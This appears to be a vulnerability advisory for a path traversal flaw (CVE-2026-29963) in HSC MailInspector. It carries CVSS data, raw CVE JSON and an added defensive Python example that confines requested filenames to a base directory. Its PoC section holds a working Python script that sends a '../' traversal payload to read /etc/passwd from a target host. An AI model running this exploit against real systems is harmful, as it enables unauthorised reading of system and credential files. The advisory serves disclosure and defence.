Security Vulnerability Report
CVE-2026-29963 CVSS 7.5 HIGH

Published: 2026-05-18 18:17:22
Last Modified: 2026-05-19 17:21:06

Description

HSC MailInspector 5.3.3-7 has a Path Traversal vulnerability due to improper validation of user-supplied input in the /tap/dw.php endpoint. The text parameter is used to construct file paths without adequate normalization or restriction to a safe base directory. A remote attacker can exploit this flaw to access arbitrary files on the underlying operating system, resulting in unauthorized disclosure of sensitive information.
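The mitigation the description points at, normalising the user-supplied name and confining the resolved path to a safe base directory, as an added example. This is not code from the advisory, the reporter, or HSC MailInspector: it is a small Python resolver that rejects the traversal pattern shown in the PoC section while accepting ordinary filenames. The base directory name and the sample requests are constructed placeholders, and the check is generic to any endpoint that serves files by name.

```python
"""Confine a user-supplied filename to a fixed download directory.

Added example illustrating the mitigation for CWE-22 described above:
normalise the requested name and refuse anything whose canonical path
lies outside the canonical base directory. Not code from the advisory
or from HSC MailInspector; all paths below are constructed placeholders.
"""
import os

# Constructed placeholder for the directory the endpoint is meant to serve.
BASE_DIR = "/srv/mailinspector_downloads"

# Constructed sample requests: legitimate names and traversal attempts.
SAMPLE_REQUESTS = [
    "report.pdf",                    # ordinary file in the base directory
    "sub/../report.pdf",             # dot-dot that still stays inside the base
    "../../../../../../etc/passwd",  # the traversal pattern from the PoC
    "/etc/passwd",                   # absolute path, which os.path.join lets replace the base
    "sub/../../secret",              # one level too far up
    "a\x00.pdf",                     # embedded NUL byte, rejected before any path work
]


class PathTraversalError(ValueError):
    """Raised when a requested name would resolve outside the base directory."""


def resolve_download_path(base_dir: str, requested: str) -> str:
    """Return the canonical absolute path of `requested` inside `base_dir`.

    Raises PathTraversalError if the request is empty, contains a NUL byte,
    or (after joining, normalising and resolving symlinks) does not lie
    strictly under the canonical base directory.
    """
    if not requested or "\x00" in requested:
        raise PathTraversalError("empty name or embedded NUL byte")

    # Canonicalise the base so symlinks in its own path do not skew the
    # comparison, and append a separator so a sibling directory such as
    # /srv/mailinspector_downloads_old cannot pass a plain prefix test.
    base = os.path.realpath(base_dir)
    base_prefix = base.rstrip(os.sep) + os.sep

    # os.path.join discards `base` entirely when `requested` is absolute, and
    # realpath collapses every '..' and follows symlinks, so the comparison
    # below is made on the path the operating system would actually open.
    candidate = os.path.realpath(os.path.join(base, requested))
    if not candidate.startswith(base_prefix):
        raise PathTraversalError(
            f"{requested!r} resolves to {candidate}, outside {base}"
        )
    return candidate


def classify_requests(base_dir: str, requests: list[str]) -> dict[str, bool]:
    """Map each requested name to True (allowed) or False (rejected)."""
    results = {}
    for name in requests:
        try:
            resolve_download_path(base_dir, name)
            results[name] = True
        except PathTraversalError:
            results[name] = False
    return results


if __name__ == "__main__":
    for name, allowed in classify_requests(BASE_DIR, SAMPLE_REQUESTS).items():
        print(f"{'ALLOW ' if allowed else 'REJECT'} {name!r}")
```

The decisive step is comparing the fully resolved candidate against the resolved base with a trailing separator: that single check covers relative dot-dot sequences, absolute paths that `os.path.join` would let override the base, and symlinks inside the directory that point elsewhere. An allow-list of permitted filenames is stricter still where the set of servable files is known in advance.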

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:hsclabs:mailinspector:5.3.3-7:*:*:*:*:*:*:* - VULNERABLE
HSC MailInspector 5.3.3-7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests


def exploit(target_ip):
    # Target endpoint vulnerable to path traversal
    url = f"http://{target_ip}/tap/dw.php"
    # Payload aiming to read /etc/passwd
    # Using '../' to traverse up the directory structure
    payload = {"text": "../../../../../../etc/passwd"}
    try:
        response = requests.post(url, data=payload, timeout=5)
        # Check if standard Linux file content is returned
        if response.status_code == 200 and "root:x" in response.text:
            print("[+] Exploit successful! File content:")
            print(response.text)
        else:
            print("[-] Exploit failed or target not vulnerable.")
            print(f"Status: {response.status_code}")
            print(f"Response: {response.text[:200]}")
    except Exception as e:
        print(f"[!] Error: {e}")


if __name__ == "__main__":
    target = "192.168.1.100"  # Replace with actual target
    exploit(target)
```

References

https://github.com/sql3t0/cve-disclosures (Third Party Advisory)
https://github.com/sql3t0/cve-disclosures/blob/main/02_-_CVE-2026-29963_LFI%2BPath_Traversal.md (Third Party Advisory)
https://hsclabs.com/pt-br/mailinspector/ (Product)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-29963",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-18T18:17:21.517",
    "lastModified": "2026-05-19T17:21:05.690",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "HSC MailInspector 5.3.3-7 has a Path Traversal vulnerability due to improper validation of user-supplied input in the /tap/dw.php endpoint. The text parameter is used to construct file paths without adequate normalization or restriction to a safe base directory. A remote attacker can exploit this flaw to access arbitrary files on the underlying operating system, resulting in unauthorized disclosure of sensitive information."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-22"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:hsclabs:mailinspector:5.3.3-7:*:*:*:*:*:*:*",
                "matchCriteriaId": "5A2C551A-C71C-468F-A438-7ED1F576338A"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/sql3t0/cve-disclosures",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      },
      {
        "url": "https://github.com/sql3t0/cve-disclosures/blob/main/02_-_CVE-2026-29963_LFI%2BPath_Traversal.md",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      },
      {
        "url": "https://hsclabs.com/pt-br/mailinspector/",
        "source": "[email protected]",
        "tags": ["Product"]
      }
    ]
  }
}
```